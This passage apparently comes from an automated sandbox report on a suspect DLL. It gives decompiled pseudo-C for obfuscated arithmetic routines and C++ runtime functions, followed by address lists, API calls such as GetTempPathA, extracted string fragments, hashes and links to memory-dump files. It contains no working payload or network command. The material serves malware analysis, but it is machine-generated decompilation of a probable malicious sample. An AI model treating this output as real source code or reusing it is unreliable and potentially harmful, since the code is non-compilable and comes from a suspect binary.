				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6d5459e6; // 0xc145
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6d5459e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6d5459e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6D4A01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6d545a90 = _t364;
						if(_t364 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6d545a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6d545a98 - _t197; // 0x6d4ee664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6d545a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6d5459e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6d545a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6d545a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6d5459d8 = _t297;
				 *0x6d5459dc = _t346;
				do {
					if(_t393 != ( *0x6d5459e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0xa8f31077
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6d545a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0xa8f310ad
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6d5459d8 = _t297;
						 *0x6d5459dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6d5459e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6d5459e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6d5459e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6d545a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6d5459f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6d5459e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6d545a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6d5459d0 = _t105 + _t347;
				_t213 = E6D481029(_t394);
				_t300 =  *0x6d545a90; // 0x30c16f5c
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6d545a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6d5459f2 =  *0x6d5459f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6d5459d0 = _t371;
				_t446 =  *0x6d545a04 - 0x1b47; // 0x0
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6d5459e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6d5459d8 = _t349;
					 *0x6d5459dc =  *(_t400 - 0x14);
					_t371 =  *0x6d5459d0; // 0xd7a19fd1
				}
				_t395 = 0x6d545a0e;
				do {
					if(_t300 != ( *0x6d5459e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6d5459e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6d5459d0 = _t371;
				_t450 =  *0x6d545a02 - _t301; // 0xa8f4
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6d5459d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6d545a90 = _t117 + _t349 * 2;
				E6D47FB4A(_t396, _t451);
				_t350 =  *0x6d545a00; // 0xa8f42e50
				_t303 = 0x6d545ac8;
				_t372 =  *0x6d5459d8; // 0x92216ed4
				do {
					_t452 = _t396 -  *0x6d545a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6d5459dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6d5459d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6d545a00 = _t350;
					} else {
						_t453 = 0 -  *0x6d545a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6d545a18);
				_t222 =  *0x6d5459dc; // 0x3
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6d545a58 =  *0x6d545a58 - _t396;
					asm("sbb [0x6d545a5c], eax");
					 *0x6d545a00 = _t354;
					asm("sbb ecx, [0x6d5459dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6d5459d8 = _t372;
					asm("adc ecx, eax");
					 *0x6d5459dc = 0;
				}
				_t305 =  *0x6d545a90; // 0x30c16f5c
				_t306 =  *0x6d5459d0; // 0xd7a19fd1
				 *0x6d5459d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6D4A0075(1);
			}

0x6d481285
0x6d48128c
0x6d481291
0x6d481297
0x6d4812a2
0x6d4812aa
0x6d4812b2
0x6d4812b8
0x6d4812ba
0x6d4812c0
0x6d4812c3
0x6d4812c5
0x6d4812c8
0x6d4812cb
0x6d4812d6
0x6d4812da
0x6d4812e0
0x6d4812ec
0x6d4812f2
0x6d4812f9
0x6d4812ff
0x6d481302
0x6d481308
0x6d48130e
0x6d481310
0x6d481310
0x6d48131d
0x6d481320
0x6d481325
0x6d481328
0x6d48132b
0x6d48132e
0x00000000
0x6d481330
0x6d481334
0x6d481338
0x6d48133d
0x6d48133f
0x6d48134b
0x6d48134d
0x6d481353
0x6d481359
0x6d481361
0x6d481363
0x00000000
0x6d481363
0x6d481361
0x00000000
0x6d481366
0x6d481366
0x6d481369
0x6d48136c
0x6d481375
0x6d481378
0x6d48137e
0x6d481390
0x6d481397
0x6d481397
0x6d481399
0x6d48139f
0x6d4813a2
0x6d4813a4
0x6d481380
0x6d481380
0x6d481386
0x00000000
0x6d481388
0x6d481388
0x6d481388
0x6d481386
0x6d4813bf
0x6d4813c5
0x6d4813cb
0x6d4813d1
0x6d4813d9
0x6d4813e1
0x6d4813e6
0x6d4813eb
0x6d4813f2
0x6d4813f8
0x6d4813fb
0x6d481401
0x6d481403
0x00000000
0x6d481405
0x6d48140b
0x6d481414
0x6d481419
0x6d48141b
0x6d481421
0x6d481424
0x6d481426
0x6d481432
0x6d48143a
0x6d48143c
0x6d481442
0x00000000
0x6d481442
0x6d48143a
0x00000000
0x6d481449
0x6d481449
0x6d48144c
0x6d481463
0x6d481468
0x6d481473
0x6d48147a
0x6d481483
0x6d481489
0x6d48148b
0x6d481491
0x6d48149a
0x6d4814a3
0x6d4814a9
0x6d4814a9
0x6d4814b7
0x6d4814bc
0x6d4814bf
0x6d4814c4
0x6d4814c6
0x6d4814cb
0x6d4814d0
0x6d4814d2
0x6d4814d5
0x6d4814d8
0x6d4814df
0x6d4814e4
0x6d4814e7
0x6d4814ec
0x6d4814f2
0x6d4814f9
0x6d4814fa
0x6d481501
0x6d48151c
0x6d481526
0x6d481526
0x6d48152c
0x6d481503
0x6d48150a
0x6d481514
0x6d481514
0x6d481531
0x6d481536
0x6d48153b
0x6d481544
0x6d481545
0x6d481545
0x6d48154b
0x6d481551
0x6d481558
0x6d481578
0x6d48157e
0x6d481586
0x6d48158b
0x6d48158b
0x6d48158d
0x6d48155a
0x6d48155a
0x6d481565
0x6d481570
0x6d481570
0x6d481593
0x6d481594
0x6d481595
0x6d4815bc
0x6d4815c1
0x6d4815c7
0x6d4815cc
0x6d4815d2
0x6d4815d8
0x6d4815e1
0x6d4815e3
0x6d4815e6
0x6d4815e9
0x6d4815eb
0x6d4815f5
0x6d4815f7
0x6d4815fa
0x6d4815fa
0x6d4815fc
0x6d4815ff
0x6d481607
0x6d48160c
0x6d481612
0x6d481618
0x6d481620
0x6d481623
0x6d481629
0x6d481644
0x6d48164e
0x6d481654
0x6d48162b
0x6d48162b
0x6d481631
0x00000000
0x6d481633
0x6d481633
0x6d48163d
0x6d48163d
0x6d481631
0x6d481664
0x6d481667
0x6d48166a
0x6d48166f
0x6d481671
0x6d481674
0x6d48167b
0x6d48167e
0x6d481683
0x6d48168a
0x6d48168f
0x6d481695
0x6d48169c
0x6d48169d
0x6d4816a2
0x6d4816a5
0x6d4816aa
0x6d4816ac
0x6d4816b6
0x6d4816bb
0x6d4816bd
0x6d4816c0
0x6d4816c3
0x6d4816c8
0x6d4816cd
0x6d4816d4
0x6d4816d9
0x6d4816df
0x6d4816eb
0x6d4816f6
0x6d4816f9
0x6d481707
0x6d48170e
0x6d481715
0x6d48171a
0x6d481720
0x6d481725
0x6d48172e
0x6d481733
0x6d481737
0x6d48173e
0x6d481748
0x6d48174a
0x6d48174d
0x6d481753
0x6d481755
0x6d481758
0x6d48175d
0x6d481763
0x00000000
0x6d481765
0x6d481765
0x6d48176b
0x00000000
0x00000000
0x6d48176b
0x6d481740
0x6d481740
0x6d481746
0x00000000
0x00000000
0x00000000
0x00000000
0x6d481746
0x00000000
0x6d48176d
0x6d48176d
0x6d481770
0x6d48177a
0x6d48177f
0x6d481785
0x6d48178d
0x6d481790
0x6d481793
0x6d481799
0x6d4817a2
0x6d4817ad
0x6d4817b4
0x6d4817b7
0x6d4817c3
0x6d4817c6
0x6d4817cc
0x6d4817e9
0x6d4817f0
0x6d4817f0
0x6d4817f3
0x6d4817f6
0x6d4817f8
0x6d4817ce
0x6d4817d1
0x6d4817d9
0x6d4817e4
0x6d4817e4
0x6d4817fe
0x6d481801
0x6d481806
0x6d481809
0x6d48180c
0x6d48180f
0x6d481812
0x6d481878
0x00000000
0x6d481814
0x6d48181b
0x6d48181f
0x6d481824
0x6d481827
0x6d481830
0x6d481836
0x6d481838
0x6d481840
0x6d481842
0x00000000
0x6d481842
0x6d481840
0x00000000
0x6d481845
0x6d481845
0x6d481848
0x6d48184b
0x6d481854
0x6d481855
0x6d481858
0x6d48185b
0x6d481861
0x6d48187d
0x6d481884
0x6d481889
0x6d481889
0x6d48188c
0x6d48188e
0x6d481863
0x6d481865
0x6d48186b
0x00000000
0x6d48186d
0x6d48186d
0x6d481870
0x6d481870
0x6d481870
0x6d48186b
0x6d481891
0x6d481897
0x6d4818b1
0x6d481899
0x6d481899
0x6d4818a5
0x6d4818a7
0x6d4818ad
0x6d4818ad
0x6d4818b6
0x6d4818c2
0x6d4818c5
0x6d4818c7
0x6d4818ca
0x6d4818cc
0x6d4818d2
0x6d4818d8
0x6d4818e1
0x6d4818e6
0x6d4818e9
0x6d4818eb
0x6d4818ed
0x6d4818f3
0x6d4818f6
0x6d4818fb
0x6d4818fe
0x6d481900
0x6d481906
0x6d481906
0x6d48190f
0x6d481912
0x6d481915
0x6d48191c
0x6d48191f
0x6d481924
0x6d481927
0x6d48192e
0x6d481931
0x6d481931
0x6d481935
0x00000000
0x6d481937
0x6d481941
0x6d481944
0x6d481946
0x6d481955
0x6d481957
0x6d48195a
0x00000000
0x6d48195a
0x6d481955
0x00000000
0x6d481961
0x6d481961
0x6d481964
0x6d481967
0x6d48196e
0x6d481975
0x6d48197a
0x6d48197f
0x6d481985
0x6d481988
0x6d48198a
0x6d48198f
0x6d481993
0x6d481995
0x6d481998
0x6d48199f
0x6d48199f
0x6d4819a1
0x6d4819a9
0x6d4819ab
0x6d4819b1
0x6d4819b8
0x6d4819eb
0x6d4819ba
0x6d4819c4
0x6d4819c9
0x6d4819d2
0x6d4819d5
0x6d4819d7
0x6d4819dd
0x6d4819e3
0x6d4819e3
0x6d4819ee
0x6d4819f3
0x6d4819fc
0x6d4819fe
0x6d481a01
0x6d481a04
0x6d481a04
0x6d481a07
0x6d481a0a
0x6d481a0a
0x6d481a0c
0x6d481a0f
0x6d481a11
0x6d481a19
0x6d481a1e
0x6d481a1f
0x6d481a25
0x6d481a2c
0x6d481a31
0x6d481a31
0x6d481a33
0x6d481a33
0x6d481a39
0x6d481a41
0x6d481a46
0x6d481a4b
0x6d481a51
0x6d481a56
0x6d481a5c
0x6d481a5e
0x6d481a64
0x6d481a6e
0x6d481a6e
0x6d481a71
0x6d481a76
0x6d481a78
0x6d481a7a
0x6d481a80
0x6d481a86
0x6d481a89
0x6d481a8b
0x6d481a66
0x6d481a66
0x6d481a6c
0x00000000
0x00000000
0x6d481a6c
0x6d481a91
0x6d481a94
0x6d481a9c
0x6d481aa3
0x6d481aa5
0x6d481ab0
0x6d481ab4
0x6d481ab6
0x6d481abd
0x6d481ac5
0x6d481acf
0x6d481ad5
0x6d481ad7
0x6d481add
0x6d481adf
0x6d481adf
0x6d481ae5
0x6d481af0
0x6d481afc
0x6d481b07

APIs

__EH_prolog3.LIBCMT ref: 6D48128C
GetSystemDirectoryA.KERNEL32 ref: 6D4813C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6D49FF71,?,00000001,?,?,00000001,?,6D5427E0,0000000C,6D4A006E,?,00000001,?), ref: 6D481468

Strings

C:\Windows\system32, xrefs: 6D4813B2
part , xrefs: 6D4815B5
YTm, xrefs: 6D48191F
YTm, xrefs: 6D481320
DZTm, xrefs: 6D481967
YTm, xrefs: 6D4815FF
6265, xrefs: 6D4814CB
DZTm, xrefs: 6D48136C
YTm, xrefs: 6D481915
Molecul, xrefs: 6D48167E
cd Island, xrefs: 6D481531
DZTm, xrefs: 6D48184B
Had s, xrefs: 6D4814DF
out drop , xrefs: 6D4816C8
DZTm, xrefs: 6D48144C
cd Matter m, xrefs: 6D481607
YTm, xrefs: 6D481A11
YTm, xrefs: 6D4813E1
YTm, xrefs: 6D481801
6623, xrefs: 6D4816B1
C:\Users\user\AppData\Local\Temp\, xrefs: 6D481459
(ZTm, xrefs: 6D48170E

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (ZTm$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZTm$DZTm$DZTm$DZTm$Had s$Molecul$cd Island$cd Matter m$out drop $part $YTm$YTm$YTm$YTm$YTm$YTm$YTm
API String ID: 3607090873-2455373159
Opcode ID: 5cdaf95911309f4f5ec5c587afcf65fbdc48957e68995f3376c9784790c60abc
Instruction ID: afbbcca64e58aa009c2940e22a9cb1095a0f64228fc2b93397ca47160b7e5e6c
Opcode Fuzzy Hash: 5cdaf95911309f4f5ec5c587afcf65fbdc48957e68995f3376c9784790c60abc
Instruction Fuzzy Hash: 6332AD71A022118FCF08EF69C481B7D77F1BB8A365B26852FD415DBB85E7309981CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6D484A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D484A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				void* _t29;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6D4A00AC(0x6d4e8144, __ebx, __edi, __esi, 0x14);
				E6D486653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6d55ce80; // 0x15b6290
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6D46161C(0x6d546b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6D46171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6D4866BA(_t61 - 0x14);
					return E6D4A0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10); // executed
						_t29 = E6D4618A0(__ebx, _t47, __edx, _t57, _t59); // executed
						__eflags = _t29 - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t61 - 0x20);
							E6D4A3D74(_t61 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e8192, __ebx, _t57, _t59, 0xc);
							_t60 = E6D484A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6D485BFB();
							return E6D4A0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6D486FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6d55ce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6d484a80
0x6d484a87
0x6d484a91
0x6d484a96
0x6d484a9f
0x6d484aa5
0x6d484aa8
0x6d484aad
0x6d484ab1
0x6d484ab6
0x6d484aba
0x6d484af5
0x6d484af8
0x6d484b04
0x6d484abc
0x6d484abe
0x6d484ac4
0x6d484aca
0x6d484acb
0x6d484ad2
0x6d484ad5
0x6d484b08
0x6d484b16
0x6d484b1b
0x6d484b23
0x6d484b2f
0x6d484b35
0x6d484b38
0x6d484b3b
0x6d484b3d
0x6d484b40
0x6d484b42
0x6d484b4a
0x6d484b53
0x6d484ad7
0x6d484ad7
0x6d484ada
0x6d484ade
0x6d484ae2
0x6d484aec
0x6d484aef
0x00000000
0x6d484aef
0x6d484ac0
0x6d484ac0
0x00000000
0x6d484ac0
0x6d484abe

APIs

__EH_prolog3.LIBCMT ref: 6D484A87
std::_Lockit::_Lockit.LIBCPMT ref: 6D484A91
int.LIBCPMT ref: 6D484AA8

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D484AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D484AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D484B16

Strings

4kTm, xrefs: 6D484A9A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4kTm
API String ID: 651022567-4149940638
Opcode ID: f716dba579ced3dcc3e4b077fe8b299ce626bacf050cb56ec346ae5620604cec
Instruction ID: af64af569437a00ebf0525cdbda25670ab5cec7f7a9b114f74401bd19d1a3625
Opcode Fuzzy Hash: f716dba579ced3dcc3e4b077fe8b299ce626bacf050cb56ec346ae5620604cec
Instruction Fuzzy Hash: 0911CE718081699BCF02DBA4C844EEDB775AF54394F2A410CE615AB291DB71DE00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CE506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6D4CE506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t241 = E6D4CF26D(__ecx, 0x6a6); // executed
				_t360 = _t241;
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6d4cda4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6d4f0f34);
					_push( *0x6d4f0dec);
					E6D4CE445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6d4f0dec;
					while(1) {
						L2:
						_t246 = E6D4DD470(_t430, 0x351, 0x6d4f0f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6d4f0f34);
							_push( *_t373);
							E6D4CE445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6d4f0e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6D4CCBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6D4CCBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6D4CCBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6D4CCBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6D4CCBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4C2188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6d54506c; // 0x9d44929c
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6D4CE506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431); // executed
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
